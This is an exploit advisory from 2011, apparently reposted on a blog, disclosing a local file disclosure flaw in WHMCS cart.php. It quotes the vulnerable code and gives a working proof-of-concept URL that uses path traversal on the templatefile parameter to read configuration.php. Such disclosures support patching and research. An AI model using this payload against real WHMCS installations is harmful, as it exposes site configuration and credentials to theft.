# Title : WHMCompleteSolution (cart.php) Local File Disclosure |
# Author : Lagripe-Dz |
# Product : WHMCS ( WHMCompleteSolution ) |
# Vendor : http://whmcs.com/ |
# Date : 10/01/2011 |
# Version : 3.x.x , 4.0.x |
# Tested on : linux+apache |
================================================================ |
Vuln file: cart.php |
--------- |
Vuln code: |
--------- |
if ( $a == "add" ) |
{ |
$templatefile = "configureproductdomain"; |
....etc |
} |
if ( $a == "login" ) |
{ |
$templatefile = "login"; |
....etc |
} |
... |
outputClientArea( $templatefile, $nowrapper ); |
# outputClientArea function will display |
"./templates/orderforms/cart/{$templatefile}.tpl" |
Details : |
--------- |
if variable "$a" has a true value .. will set "$templatefile" value by |
default |
but when "$a" value didn't match the defaults values |
you can control "$templatefile" and use it as ( File Disclosure ) |
Proof of Concept : |
------------------ |
http://domain.tld/[PATH]/cart.php?a=[wrong_value]&templatefile=[LFD] |
http://domain.tld/[PATH]/cart.php?a=test&templatefile=../../../configuration.php |
note* : show the page source to see Disclosure file. |
Solution : |
---------- |
the vendor Notificate |
update to the last version |
================================================================ |
Greetz To All www.Sec4ever.com Members. |
No comments:
Post a Comment